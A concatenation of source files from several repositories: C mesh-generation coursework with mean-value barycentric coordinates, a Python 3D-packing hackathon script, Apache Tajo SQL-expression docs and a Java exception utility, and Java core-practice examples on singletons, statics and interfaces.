#include <math.h>
#include <assert.h>
#define CORRECTION
/*------------------------------------------------------------------------*/
void freeMesh(struct Mesh *m) {
free(m->v_points);
free(m->v_triangles);
free(m->v_edges);
free(m->v_boundary_id);
free(m->nbNeighbors);
free(m->neighbors);
free(m->barycoord);
free(m->gradOp);
}
/*------------------------------------------------------------------------*/
void saveBinaryMesh(struct Mesh *m, const char* filename)
{
FILE *f = fopen(filename,"wb");
fwrite(&(m->n_points), sizeof(int), 1, f);
fwrite(&(m->n_triangles), sizeof(int), 1, f);
fwrite(&(m->n_edges), sizeof(int), 1, f);
fwrite(m->v_points, sizeof(struct vec2), m->n_points, f);
fwrite(m->v_triangles, sizeof(struct triangle), m->n_triangles, f);
fwrite(m->v_edges, sizeof(struct edge), m->n_edges, f);
fwrite(m->v_boundary_id, sizeof(int), m->n_points, f);
fwrite(&(m->nmax), sizeof(int), 1, f);
fwrite(m->nbNeighbors, sizeof(int), m->n_points, f);
fwrite(m->neighbors, sizeof(int), m->n_points*m->nmax, f);
fwrite(m->barycoord, sizeof(REAL), m->n_points*m->nmax, f);
fwrite(m->gradOp, sizeof(REAL), m->n_points*(2*(m->nmax+1)), f);
fclose(f);
}
/*------------------------------------------------------------------------*/
void loadBinaryMesh(struct Mesh *m, const char* filename) {
FILE *f = fopen(filename,"rb");
fread(&(m->n_points), sizeof(int), 1, f);
fread(&(m->n_triangles), sizeof(int), 1, f);
fread(&(m->n_edges), sizeof(int), 1, f);
m->v_points = (struct vec2*) malloc(sizeof(struct vec2) * m->n_points);
fread(m->v_points, sizeof(struct vec2), m->n_points, f);
m->v_triangles = (struct triangle*) malloc(sizeof(struct triangle) * m->n_triangles);
fread(m->v_triangles, sizeof(struct triangle), m->n_triangles, f);
m->v_edges = (struct edge*) malloc(sizeof(struct edge) * m->n_edges);
fread(m->v_edges, sizeof(struct edge), m->n_edges, f);
m->v_boundary_id = (int*) malloc(sizeof(int) * m->n_points);
fread(m->v_boundary_id, sizeof(int), m->n_points, f);
fread(&(m->nmax), sizeof(int), 1, f);
m->nbNeighbors = (int*) malloc(sizeof(int) * m->n_points);
fread(m->nbNeighbors, sizeof(int), m->n_points, f);
m->neighbors = (int*) malloc(sizeof(int) * m->n_points*m->nmax);
fread(m->neighbors, sizeof(int), m->n_points*m->nmax, f);
m->barycoord = (REAL*) malloc(sizeof(REAL) * m->n_points*m->nmax);
fread(m->barycoord, sizeof(REAL), m->n_points*m->nmax, f);
m->gradOp = (REAL*) malloc(sizeof(REAL) * m->n_points*(2*(m->nmax+1)));
fread(m->gradOp, sizeof(REAL), m->n_points*(2*(m->nmax+1)), f);
fclose(f);
}
/*------------------------------------------------------------------------*/
void saveToObj(struct Mesh *m, REAL *u, REAL factor, const char* filename)
{
FILE *outfile = fopen(filename, "w");
if (outfile == (FILE *) NULL) {
printf(" Error: Cannot create file %s.\n", filename);
exit(1);
}
fprintf(outfile, "# nb vertices = %d, nb faces = %d\n", m->n_points, m->n_triangles);
for (int i = 0; i<m->n_points; i++) {
fprintf(outfile, "v %.17g %.17g %.17g\n",
m->v_points[i].x,
m->v_points[i].y,
u[i]*factor);
}
// WARNING : obj file indices start at 1
for (int i = 0; i<m->n_triangles; i++) {
fprintf(outfile, "f %4d %4d %4d\n",
m->v_triangles[i].v_id[0]+1,
m->v_triangles[i].v_id[1]+1,
m->v_triangles[i].v_id[2]+1);
}
fprintf(outfile, "\n");
fclose(outfile);
}
/*------------------------------------------------------------------------*/
<file_sep>
#include <stdio.h>
#include <stdlib.h>
#include <math.h>
#include <assert.h>
#include "mesh.h"
/*------------------------------------------------------------------------*/
void matrixMult(REAL *A, REAL *B, REAL *R, int n_row, int n_col, int n) {
////////////////////////////////////////////////////////////////
//TODO : STEP 7
//TODO implement matrix multiplication here
// you can change the signature of the function if you find it useful=
////////////////////////////////////////////////////////////////
}
void buildOpGrad(struct Mesh *mesh, int i, REAL *opM, REAL *B)
{
////////////////////////////////////////////////////////////////
//TODO : STEP 8
//TODO compute matrix opM
////////////////////////////////////////////////////////////////
}
/*------------------------------------------------------------------------*/
void moveAndInit(struct triangulateio *in, struct Mesh *mesh)
{
assert(in->numberofcorners==3);
mesh->n_points = in->numberofpoints;
mesh->n_triangles = in->numberoftriangles;
mesh->n_edges = in->numberofedges;
mesh->v_points = (struct vec2*)in->pointlist;
in->pointlist = NULL;
mesh->v_triangles = (struct triangle*)in->trianglelist;
in->trianglelist = NULL;
mesh->v_edges = (struct edge*)in->edgelist;
in->edgelist = NULL;
mesh->v_boundary_id = in->pointmarkerlist;
in->pointmarkerlist = NULL;
// Initialize adjacency between vertices
mesh->nbNeighbors = (int *) calloc(mesh->n_points,sizeof(int));
// first we need to find the maximal number of neighbors per vertex
mesh->nmax = 0;
for(int i = 0; i<mesh->n_edges; ++i ) {
mesh->nbNeighbors[ mesh->v_edges[i].v_id[0] ] += 1;
mesh->nbNeighbors[ mesh->v_edges[i].v_id[1] ] += 1;
}
for(int i = 0; i<mesh->n_points; ++i ) {
if(mesh->nbNeighbors[i]>mesh->nmax)
mesh->nmax = mesh->nbNeighbors[i];
mesh->nbNeighbors[i] = 0; // we need it to be zero for init of next step
}
printf("Maximum number of neighbors per Vertex : %d\n", mesh->nmax);
mesh->neighbors = (int *) malloc(mesh->nmax * mesh->n_points*sizeof(int));
for(int i = 0; i<mesh->n_edges; ++i ) {
int k = mesh->v_edges[i].v_id[0];
int l = mesh->v_edges[i].v_id[1];
mesh->neighbors[k*mesh->nmax + mesh->nbNeighbors[k]] = l;
mesh->nbNeighbors[k] += 1;
mesh->neighbors[l*mesh->nmax + mesh->nbNeighbors[l]] = k;
mesh->nbNeighbors[l] += 1;
}
mesh->barycoord = NULL;
// Initialize the generalized barycentric coordinate
computeMeanValueCoordinates(mesh);
}
/*------------------------------------------------------------------------*/
void computeMeanValueCoordinates(struct Mesh *mesh)
{
if(mesh->barycoord!=NULL) {
free(mesh->barycoord);
}
mesh->barycoord = (REAL *) calloc(mesh->nmax*mesh->n_points,sizeof(REAL));
////////////////////////////////////////////////////////////////
//TODO : STEP 9
//TODO : shoud be replaced by computation of generalized barycentric coordinates
for(int i = 0; i<mesh->n_points; ++i ) {
REAL v = 1.0/((REAL)mesh->nbNeighbors[i]);
for (int j = 0; j<mesh->nbNeighbors[i]; ++j) {
mesh->barycoord[i*mesh->nmax + j] = v;
}
}
////////////////////////////////////////////////////////////////
for(int i = 0; i<mesh->n_points; ++i ) {
REAL sum = 0.0;
for (int j = 0; j<mesh->nbNeighbors[i];++j) {
sum+= mesh->barycoord[i*mesh->nmax+j];
}
printf("%f",sum);
printf("\n");
}
// Affiche les coordonnées de tout les vertex relatif à leur voisin
for(int i = 0; i<mesh->n_points; ++i ) {
if(mesh->v_boundary_id[i]==0)
for (int j = 0; j<mesh->nbNeighbors[i];++j) {
printf("%g ",mesh->barycoord[i*mesh->nmax+j]);
}
printf("\n");
}
// Simple test : compare the vertex with the position obtained from barycentric coordinates
for(int i = 0; i<mesh->n_points; ++i ) {
if(mesh->v_boundary_id[i]==0) {
REAL x = 0.0;
REAL y = 0.0;
for(int k=0; k<mesh->nbNeighbors[i]; ++k) {
x += mesh->v_points[mesh->neighbors[i*mesh->nmax+k]].x
* mesh->barycoord[i*mesh->nmax+k];
y += mesh->v_points[mesh->neighbors[i*mesh->nmax+k]].y
* mesh->barycoord[i*mesh->nmax+k];
}
printf("Xerr : %g", fabs(mesh->v_points[i].x-x));
printf(" Yerr : %g\n", fabs(mesh->v_points[i].y-y));
}
}
}
/*------------------------------------------------------------------------*/
<file_sep>
#pragma once
#ifndef MESH_H
#define MESH_H
#ifdef SINGLE
#define REAL float
#else /* not SINGLE */
#define REAL double
#endif /* not SINGLE */
#ifndef TRIANGLE_H
#define TRIANGLE_H
#include "triangle.h"
#endif
/*****************************************************************************/
/* */
/* a mesh data structure, mostly a copy form the one returned by triangle */
/* */
/*****************************************************************************/
/** A point in 2 dimension
*/
struct vec2 {
REAL x, y;
};
/** Vertices (id) of a triangle
*/
struct triangle {
int v_id[3];
};
/** Vertices (id) of an edge
*/
struct edge {
int v_id[2];
};
/** A mesh in 2 dimension
*/
struct Mesh {
int n_points; // number of points
int n_triangles; // number of triangles
int n_edges;
struct vec2* v_points;
struct triangle *v_triangles;
struct edge *v_edges;
int *v_boundary_id; // 1 value per vertex, val of 0 means not on boundary
int nmax; //maximum number of neighbors per vertex
int *nbNeighbors; // 1 value per vertex, numbers of neighbors
int *neighbors; // id of neighbors
REAL *barycoord;
// we end up with some unused memory, but we have direct access to data of vertex i :
// neighbors[i*nmax + j] => id of j-th neighbors of vertex i
// barycoord[i*nmax + j] => associated barycentric coordinates
// NB : we could have store pointer to struct instead, but this would have required more
// pointer management and memory allocations
// we can also store precomputed matrices here (avoid a large amount of redundant
// computation at the expense of memory)
};
/** Initialize mesh structure from triangle output */
void moveAndInit(struct triangulateio *in, struct Mesh *mesh);
/** Computation of generalized barycentric coordinates */
void computeMeanValueCoordinates(struct Mesh *mesh);
/** Compute the multiplication A*B and set the result in R.
*
* All matrices are stored in row major format.
*
* A is of size (n_row,n)
* B is of size (n, n_col)
* R is of size (n_row,n_col)
*
* The memory of R should already be allocated.
*/
void matrixMult(REAL *A, REAL *B, REAL *R, int n_row, int n_col, int n);
/** Compute the matrix operator corresponding to the gradient of vertex i
*
* All matrices are stored in row major format and there memory should be
* already allocated.
*
* opM will contains the result, it should be able to represent a matrix up to size (2,nmax+1)
*
* B should be able to represent a matrix up to size (2,nmax+1)
*/
void buildOpGrad(struct Mesh *mesh, int i, REAL *opM, REAL *B);
#endif
<file_sep> // correct the id of boundary (as newly created point are of id 1...)
// assume 2 type of boundary cannot be connected...
int not_finished = 1;
while(not_finished) {
not_finished = 0;
for(int i = 0; i<mesh.n_points; ++i ) {
if(mesh.v_boundary_id[i] == 1) {
int found = 0;
int nn = mesh.nbNeighbors[i];
for(int k=0; k<nn; ++k) {
int n_id = mesh.neighbors[i*mesh.nmax+k];
if(mesh.v_boundary_id[n_id]==2) {
mesh.v_boundary_id[i] = 2;
found = 1;
} else if(mesh.v_boundary_id[n_id]==3) {
mesh.v_boundary_id[i] = 3;
found = 1;
}
}
if(!found) not_finished = 1;
}
}
}
// mark neighbors to boundaries
for(int i = 0; i<mesh.n_points; ++i ) {
if(mesh.v_boundary_id[i] == 0) {
int nn = mesh.nbNeighbors[i];
for(int k=0; k<nn; ++k) {
int n_id = mesh.neighbors[i*mesh.nmax+k];
if(mesh.v_boundary_id[n_id]==2) {
mesh.v_boundary_id[i] = -2;
}
}
}
}
//////////////////////////////
void computeMeanValueCoordinates(struct Mesh *mesh)
{
if(mesh->barycoord!=NULL) {
free(mesh->barycoord);
}
mesh->barycoord = (REAL *) calloc(mesh->nmax*mesh->n_points,sizeof(REAL));
#ifdef CORRECTION
//#if 0
// allocate temporary data structures to store 3 REAL per triangles (1 per triangle's edges)
REAL *tanvalues = (REAL *) malloc(3*mesh->n_triangles*sizeof(REAL));
REAL *normvalues = (REAL *) malloc(3*mesh->n_triangles*sizeof(REAL));
for(int i = 0; i<mesh->n_triangles; i++)
{
for(int j=0; j<3; ++j) {
int v0 = mesh->v_triangles[i].v_id[j];
int v1 = mesh->v_triangles[i].v_id[(j+1)%3] ;
REAL dx_1 = mesh->v_points[v1].x - mesh->v_points[v0].x;
REAL dy_1 = mesh->v_points[v1].y - mesh->v_points[v0].y;
REAL n1 = sqrt(dx_1*dx_1+dy_1*dy_1);
normvalues[ i * 3 + j] = n1;
int v2 = mesh->v_triangles[i].v_id[(j+2)%3];
REAL dx_2 = mesh->v_points[v2].x - mesh->v_points[v0].x;
REAL dy_2 = mesh->v_points[v2].y - mesh->v_points[v0].y;
REAL n2 = sqrt(dx_2*dx_2+dy_2*dy_2);
REAL dot = (dx_1*dx_2 + dy_1*dy_2)/(n1*n2);
REAL cross = (dx_1*dy_2 - dy_1*dx_2)/(n1*n2);
assert(cross>0.0);
REAL z = (1.0-dot)/cross;
//REAL z = cross/(1.0+dot);
tanvalues[ i * 3 + j] = z;
}
}
for(int i = 0; i<mesh->n_triangles; i++){
for(int j=0; j<3; ++j) {
int v0 = mesh->v_triangles[i].v_id[j];
//look for the rigth index
int v1 = mesh->v_triangles[i].v_id[(j+1)%3] ;
for(int k=0; k<mesh->nbNeighbors[v0] ; ++k) {
if(mesh->neighbors[v0*mesh->nmax+k] == v1) {
mesh->barycoord[v0*mesh->nmax+k] += tanvalues[ i * 3 + j];
break;
}
}
int v2 = mesh->v_triangles[i].v_id[(j+2)%3] ;
for(int k=0; k<mesh->nbNeighbors[v0]; ++k) {
if(mesh->neighbors[v0*mesh->nmax+k] == v2) {
mesh->barycoord[v0*mesh->nmax+k] += tanvalues[ i * 3 + j];
break;
}
}
}
}
// perform the division by norm
for(int i = 0; i<mesh->n_triangles; i++){
for(int j=0; j<3; ++j) {
int v0 = mesh->v_triangles[i].v_id[j];
int v1 = mesh->v_triangles[i].v_id[(j+1)%3] ;
//look for the rigth index
for(int k=0; k<mesh->nbNeighbors[v0]; ++k) {
if(mesh->neighbors[v0*mesh->nmax+k] == v1) {
mesh->barycoord[v0*mesh->nmax+k] /= normvalues[ i * 3 + j];
break;
}
}
}
}
// Normalize all mean value coordinates !
for(int i = 0; i<mesh->n_points; ++i ) {
REAL sum = 0.0;
for (int j = 0; j<mesh->nbNeighbors[i]; ++j) {
sum += mesh->barycoord[i*mesh->nmax + j];
}
for (int j = 0; j<mesh->nbNeighbors[i];++j) {
mesh->barycoord[i*mesh->nmax + j] /= sum;
}
}
#else
//TODO : shoud be replaced by computation of generalized barycentric coordinates
for(int i = 0; i<mesh->n_points; ++i ) {
REAL v = 1.0/((REAL)mesh->nbNeighbors[i]);
for (int j = 0; j<mesh->nbNeighbors[i]; ++j) {
mesh->barycoord[i*mesh->nmax + j] = v;
}
}
#endif
// testMeanValueCoordinates(mesh);
for(int i = 0; i<mesh->n_points; ++i ) {
REAL sum = 0.0;
for (int j = 0; j<mesh->nbNeighbors[i];++j) {
sum+= mesh->barycoord[i*mesh->nmax+j];
}
assert(fabs(sum-1.0) < 11.0e-8);
}
// Affiche les coordonnées de tout les vertex relatif à leur voisin
for(int i = 0; i<mesh->n_points; ++i ) {
if(mesh->v_boundary_id[i]==0) {
for (int j = 0; j<mesh->nbNeighbors[i];++j) {
printf("%g ",mesh->barycoord[i*mesh->nmax+j]);
}
printf("\n");
}
}
// Simple test : compare the vertex with the position obtained from barycentric coordinates
for(int i = 0; i<mesh->n_points; ++i ) {
if(mesh->v_boundary_id[i]==0) {
REAL x = 0.0;
REAL y = 0.0;
for(int k=0; k<mesh->nbNeighbors[i]; ++k) {
x += mesh->v_points[mesh->neighbors[i*mesh->nmax+k]].x
* mesh->barycoord[i*mesh->nmax+k];
y += mesh->v_points[mesh->neighbors[i*mesh->nmax+k]].y
* mesh->barycoord[i*mesh->nmax+k];
}
printf("Xerr : %g", fabs(mesh->v_points[i].x-x));
printf(" Yerr : %g\n", fabs(mesh->v_points[i].y-y));
}
}
}
<file_sep>
#pragma once
#ifndef MESH_H
#define MESH_H
#ifdef SINGLE
#define REAL float
#else /* not SINGLE */
#define REAL double
#endif /* not SINGLE */
/*****************************************************************************/
/* */
/* a mesh data structure, mostly a copy form the one returned by triangle */
/* */
/*****************************************************************************/
/** A point in 2 dimension
*/
struct vec2 {
REAL x, y;
};
/** Vertices (id) of a triangle
*/
struct triangle {
int v_id[3];
};
/** Vertices (id) of an edge
*/
struct edge {
int v_id[2];
};
/** A mesh in 2 dimension
*/
struct Mesh {
int n_points; // number of points
int n_triangles; // number of triangles
int n_edges;
struct vec2* v_points;
struct triangle *v_triangles;
struct edge *v_edges;
int *v_boundary_id; // 1 value per vertex, val of 0 means not on boundary
int nmax; //maximum number of neighbors per vertex
int *nbNeighbors; // 1 value per vertex, numbers of neighbors
int *neighbors; // id of neighbors
REAL *barycoord;
// we end up with some unused memory, but we have direct access to data of vertex i :
// neighbors[i*nmax + j] => id of j-th neighbors of vertex i
// barycoord[i*nmax + j] => associated barycentric coordinates
// NB : we could have store pointer to struct instead, but this would have required more
// pointer management and memory allocations
// we can also store precomputed matrices here (avoid a large amount of redundant
// computation at the expense of memory)
REAL *gradOp;
};
/** Free inner pointer of a mesh
*/
void freeMesh(struct Mesh *m);
/** Save mesh to binary file
*/
void saveBinaryMesh(struct Mesh *m, const char* filename);
/** Load mesh from binary file
*/
void loadBinaryMesh(struct Mesh *m, const char* filename);
/** Save mesh to obj format
*/
void saveToObj(struct Mesh *m, REAL *u, REAL factor, const char* filename);
#endif
<file_sep>/*****************************************************************************/
/* */
/* (meshGen.c) */
/* */
/*****************************************************************************/
#ifdef SINGLE
#define REAL float
#else /* not SINGLE */
#define REAL double
#endif /* not SINGLE */
#include <stdio.h>
#include <stdlib.h>
#ifndef TRIANGLE_H
#define TRIANGLE_H
#include "triangle.h" // this file is NOT in the public domains !!!!
/* <NAME> */
/* 2360 Woolsey #H */
/* Berkeley, California 94705-1927 */
/* <EMAIL> */
#endif
#include "triangleIO.h"
#include "mesh.h"
#include <math.h>
#include <assert.h>
/*****************************************************************************/
/* */
/* Our main function */
/* */
/*****************************************************************************/
int main()
{
// Define an input and output data structure for triangle
struct triangulateio in, out;
// Read formated input representing the contour
FILE * pFile = fopen ("contour.txt","r");
int nb_point_exterior, nb_point_cavity;
fscanf (pFile, "%i %i\n", &nb_point_exterior, &nb_point_cavity);
////////////////////////////////////////////////////////////////////////////////////
//TODO a changer :you should first initialize those values
// in.numberofpoints
// in.pointlist
printf("%i %i\n",nb_point_exterior, nb_point_cavity); //TODO STEP 1 & ?: a remplacer
////////////////////////////////////////////////////////////////////////////////////
// read exterior contour
char test1;
fscanf (pFile, "%c\n", &test1);
assert(test1=='#');
REAL x,y;
for(int i=0; i<nb_point_exterior; ++i) {
fscanf (pFile, "%lf %lf\n", &x, &y);
////////////////////////////////////////////////////////////////////////////////////
printf("%f %f\n",x, y); //TODO STEP1: a remplacer
////////////////////////////////////////////////////////////////////////////////////
}
// read contour of cavity
char test2;
fscanf (pFile, "%c\n", &test2);
assert(test2=='#');
struct vec2 hole_center; // coordinates of a point inside cavity
hole_center.x = 0.0;
hole_center.y = 0.0;
for(int i=0; i<nb_point_cavity; ++i) {
fscanf (pFile, "%lf %lf\n", &x, &y);
////////////////////////////////////////////////////////////////////////////////////
printf("%f %f\n",x, y); //TODO STEP2: a remplacer
////////////////////////////////////////////////////////////////////////////////////
}
fclose (pFile);
////////////////////////////////////////////////////////////////////////////////////
//TODO STEP3
in.numberofsegments = 0;
////////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////////
//TODO STEP4
//TODO value to modify after first step is working (usefull to know which
// point belong to boundary)
in.pointmarkerlist = (int *) malloc(in.numberofpoints * sizeof(int));
for(int i=0; i<in.numberofpoints; i++) {
in.pointmarkerlist[i] = 0;
}
////////////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////
//TODO Step 5
in.numberofholes = 0;
//TODO init in.numberofholes and in.holelist
///////////////////////////////////////////////////
// Can be ignored safely
in.numberofpointattributes = 0;
in.pointattributelist = (REAL *) NULL;
in.numberofregions = 0;
in.regionlist = (REAL *) NULL;
printf("Input point set:\n\n");
report(&in, 1, 0, 0, 0, 0, 0);
/* Make necessary initializations so that Triangle can return a triangulation in out */
out.pointlist = (REAL *) NULL; /* Not needed if -N switch used. */
/* Not needed if -N switch used or number of point attributes is zero: */
out.pointattributelist = (REAL *) NULL;
out.pointmarkerlist = (int *) NULL; /* Not needed if -N or -B switch used. */
out.trianglelist = (int *) NULL; /* Not needed if -E switch used. */
/* Not needed if -E switch used or number of triangle attributes is zero: */
out.triangleattributelist = (REAL *) NULL;
out.neighborlist = (int *) NULL; /* Needed only if -n switch used. */
/* Needed only if segments are output (-p or -c) and -P not used: */
out.segmentlist = (int *) NULL;
/* Needed only if segments are output (-p or -c) and -P and -B not used: */
out.segmentmarkerlist = (int *) NULL;
out.edgelist = (int *) NULL; /* Needed only if -e switch used. */
out.edgemarkerlist = (int *) NULL; /* Needed if -e used and -B not used. */
////////////////////////////////////////////////////////////////
//TODO : test in order
triangulate("pcze", &in, &out, (struct triangulateio *) NULL);
// triangulate("pze", &in, &out, (struct triangulateio *) NULL);
// triangulate("pzea50.0", &in, &out, (struct triangulateio *) NULL);
// triangulate("pzea50.0q", &in, &out, (struct triangulateio *) NULL);
////////////////////////////////////////////////////////////////
// Allow the use of program showme to visualize results
saveToFiles(&out);
// Build the mesh data-structure
struct Mesh mesh;
moveAndInit(&out, &mesh);
// Compute gradient
////////////////////////////////////////////////////////////////
//TODO STEP 6
for(int i = 0; i<mesh.n_points; ++i )
{
//TODO test case to check validity of gradient computation
// Initialize function values and closed-form gradients
}
for(int i = 0; i<mesh.n_points; ++i )
{
//TODO Compute gradients
}
for(int i = 0; i<mesh.n_points; ++i )
{
//TODO Compare closed-form and numerical gradients
}
////////////////////////////////////////////////////////////////
// Free all the memory
free(in.pointlist);
free(in.pointattributelist);
free(in.pointmarkerlist);
free(in.regionlist);
free(mesh.v_points);
free(mesh.v_triangles);
free(mesh.v_edges);
free(mesh.v_boundary_id);
free(mesh.nbNeighbors);
free(mesh.neighbors);
free(mesh.barycoord);
return 0;
}
| b737afac3caefdd96425bdaa63d69c6dd14f2f1e | [
"C"
] | 7 | C | czanni/mesh4music | 78d4275007946d141656a474f4327f7cac8f48b7 | 20e67f9e4e3fb942b9475fc3807e097994d390d0 |
refs/heads/main | <file_sep># 🧑💻 relaxdays-3d_packing
This project was created in the Relaxdays Code Challenge Vol. 1.
See the [hackathon homepage](https://sites.google.com/relaxdays.de/hackathon-relaxdays/startseite) for more information.
Our participant ID in the challenge were: `CC-VOL1-54` and `CC-VOL1-62`
We haven't really come far with our implementation. It is just callable with an example inside the Code and without Frontend.<file_sep># -*- coding: utf-8 -*-
"""
Created on Sat Mar 13 22:22:51 2021
@author: Kevin
"""
def getMaxPackageKoordniate(packages):
x = 0
y = 0
z = 0
for package in packages:
x = x if x > package[0] else package[0]
y = y if y > package[1] else package[1]
z = z if z > package[2] else package[2]
return [x,y,z]
def pickBiggestPackage(packages):
max_vol = 0
max_vol_index = -1
for i, package in enumerate(packages):
vol = package[0]*package[1]*package[2]
if(max_vol < vol):
max_vol_index = i
max_vol = vol
return max_vol_index, max_vol
def fittingPackages(package_types, package):
list_of_indexes = []
for i, package_type in enumerate(package_types):
#Check X
if package_type[0] < package[0]:
continue
#Check Y
if package_type[1] < package[1]:
continue
#Check Z
if package_type[2] < package[2]:
continue
list_of_indexes.append(i)
return list_of_indexes
def pickLowestCost(package_costs, allowed_packages):
import numpy as np
costs = np.infty
best_index = -1
for i in allowed_packages:
if costs > package_costs[i]:
best_index = i
costs = package_costs[i]
return best_index
def calcCosts(used_packages, prices):
sum_ = 0
for pack in used_packages:
sum_ += prices[pack]
return sum_
if __name__ == '__main__':
#Args
package_types = [[10,20,15], [10,10,10]]
package_costs = [50, 25]
packages = [[10,10,5],[5,5,5],[9,4,5],[10,20,10],[10,10,10]]
#Volumes that are generated by putting Package into Pack
used_packages = []
article_positions = []
for i, package in enumerate(packages):
#Check Boxes where the package fits
fitting_packs = fittingPackages(package_types, package)
#Check the lowest Cost pack
lowest_cost_pack = pickLowestCost(package_costs, fitting_packs)
used_packages.append(lowest_cost_pack)
article_positions.append([i, 0,0,0])
print(used_packages)
print(article_positions)
print(f'Costs: {calcCosts(used_packages, package_costs)}')
| ba1a4f18f9bf3f55e20bc5766993c7e7dbd646c6 | [
"Markdown",
"Python"
] | 2 | Markdown | ZapCupy/relaxdays-3d_packing | 81c70f3d0aa8539473223803a2379d6533ef3b75 | 3df555af18d7ee052fdbfe9ae09328c159369594 |
refs/heads/master | <file_sep>============================
SQL Expressions
============================
-------------------------
Arithmetic Expressions
-------------------------
-------------------------
Type Casts
-------------------------
A type cast converts a specified-typed data to another-typed data. Tajo has two type cast syntax:
.. code-block:: sql
CAST ( expression AS type )
expression::type
In addition, several functions are provided for type conversion. Please refer to `:doc:data_type_func_and_operators` and `:doc:datetime_func_and_operators`.
-------------------------
String Constants
-------------------------
A string constant is an arbitrary sequence of characters bounded by single quotes (``'``):
.. code-block:: sql
'tajo'
-------------------------
Function Call
-------------------------
The syntax for a function call consists of the name of a function and its argument list enclosed in parentheses:
.. code-block:: sql
function_name ([expression [, expression ... ]] )
For more information about functions, please refer to `:doc:functions`.<file_sep>/*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.tajo.exception;
import com.google.common.collect.Maps;
import org.apache.tajo.error.Errors.ResultCode;
import org.apache.tajo.rpc.protocolrecords.PrimitiveProtos.ReturnState;
import java.sql.SQLException;
import java.util.Map;
import static org.apache.tajo.exception.ReturnStateUtil.isError;
public class SQLExceptionUtil {
private static final Map<ResultCode, String> SQLSTATES = Maps.newHashMap();
static {
// TODO - All SQLState should be be filled
SQLSTATES.put(ResultCode.FEATURE_NOT_SUPPORTED, "0A000");
SQLSTATES.put(ResultCode.NOT_IMPLEMENTED, "0A000");
SQLSTATES.put(ResultCode.SYNTAX_ERROR, "42601");
}
public static boolean isThisError(SQLException e, ResultCode code) {
if (SQLSTATES.containsKey(code)) {
return e.getSQLState().equals(SQLSTATES.get(code));
} else {
throw new TajoInternalError("Unknown error code: " + code.name());
}
}
public static void throwIfError(ReturnState state) throws SQLException {
if (isError(state)) {
throw toSQLException(state);
}
}
private static SQLException toSQLException(ResultCode code, String message) throws SQLException {
if (SQLSTATES.containsKey(code)) {
return new SQLException(
message,
SQLSTATES.get(code),
code.getNumber()
);
} else {
// If there is no SQLState corresponding to error code,
// It will make SQLState '42000' (Syntax Error Or Access Rule Violation).
return new SQLException(
message,
"42000",
ResultCode.SYNTAX_ERROR_OR_ACCESS_RULE_VIOLATION_VALUE
);
}
}
public static SQLException toSQLException(TajoException e) throws SQLException {
return toSQLException(e.getErrorCode(), e.getMessage());
}
public static SQLException toSQLException(ReturnState state) throws SQLException {
return toSQLException(state.getReturnCode(), state.getMessage());
}
public static SQLException makeSQLException(ResultCode code, String ...args) {
if (SQLSTATES.containsKey(code)) {
return new SQLException(
ErrorMessages.getMessage(code, args),
SQLSTATES.get(code),
code.getNumber());
} else {
// If there is no SQLState corresponding to error code,
// It will make SQLState '42000' (Syntax Error Or Access Rule Violation).
return new SQLException(
code.name(),
"42000",
code.getNumber());
}
}
public static SQLException makeUnableToEstablishConnection(Throwable t) {
return makeSQLException(
ResultCode.CLIENT_UNABLE_TO_ESTABLISH_CONNECTION, t.getMessage());
}
}
| 836ac5e5cdef1b44c5d003b67904f952314537fc | [
"Java",
"reStructuredText"
] | 2 | reStructuredText | adbadb/tajo | 22ab1cf974031bc58d2ff1a6d34102c0c4997184 | 9ef8010c149d6bdbfe2beefca0ebf491918f8e4a |
refs/heads/master | <repo_name>sree285/core-java<file_sep>/core-java/src/com/core/practice/superexample/SuperMain.java
package com.core.practice.superexample;
public class SuperMain {
public static void main(String[] args) {
Child c = new Child();
System.out.println(c.getChildClassName());
System.out.println(c.getParentClassName());
System.out.println(c.callParentMethod());
}
}
<file_sep>/core-java/src/com/core/practice/staticexample/StaticMain.java
package com.core.practice.staticexample;
import com.core.practice.singleton.MySingleton;
public class StaticMain {
public static void main(String[] args) {
Employee e1 = new Employee();
e1.setEmpName("Nirmal");
e1.setEmpId("1");
e1.setGrade("PA");
e1.setSalary("5LPA");
e1.getEmpId();
System.out.println("Employee:"+ e1.getEmpId() + " " + e1.getEmpName() + " "+Employee.company);
Employee e2 = new Employee();
e2.setEmpName("Kumar");
e2.setEmpId("1");
e2.setGrade("A");
e2.setSalary("6LPA");
System.out.println("Employee:"+ e2.getEmpId() + " " + e2.getEmpName()+" "+Employee.company);
System.out.println("Date:"+Employee.getCurrentDate());
MySingleton st2 = MySingleton.getInstance();
System.out.println(st2.getName());
}
}
<file_sep>/core-java/src/com/core/practice/interfaceabstract/Employee.java
package com.core.practice.interfaceabstract;
public abstract class Employee {
abstract String getStudentName();
abstract String getStudentGrade();
String getStudentSchool() {
return "Bschool";
}
}
<file_sep>/core-java/src/com/core/practice/interfaceabstract/Student.java
package com.core.practice.interfaceabstract;
public interface Student {
String getStudentName();
String getStudentGrade();
public static final int name = 5;
public abstract void print();
}
<file_sep>/core-java/src/com/core/practice/singleton/MySingleton.java
package com.core.practice.singleton;
public class MySingleton {
private static MySingleton myObj;
/**
* Create private constructor
*/
private MySingleton() {
}
/**
* Create a static method to get instance.
*/
public static MySingleton getInstance() {
if (myObj == null) {
myObj = new MySingleton();
}
return myObj;
}
public void getSomeThing() {
System.out.println("first time new instance");
}
public void callAgain() {
System.out.println("second time same instance");
}
public String getName() {
int c = 5 + 3;
return String.valueOf(c);
}
}
<file_sep>/core-java/src/com/core/practice/interfaceabstract/EmployeeExtend.java
package com.core.practice.interfaceabstract;
public class EmployeeExtend extends Employee {
@Override
String getStudentName() {
return "Name";
}
@Override
String getStudentGrade() {
return "grade";
}
public static void main(String[] args) {
EmployeeExtend obj = new EmployeeExtend();
obj.getStudentGrade();
obj.getStudentSchool();
}
}
| 8bc08d69e489745d986d929a68aaf9a63eef484b | [
"Java"
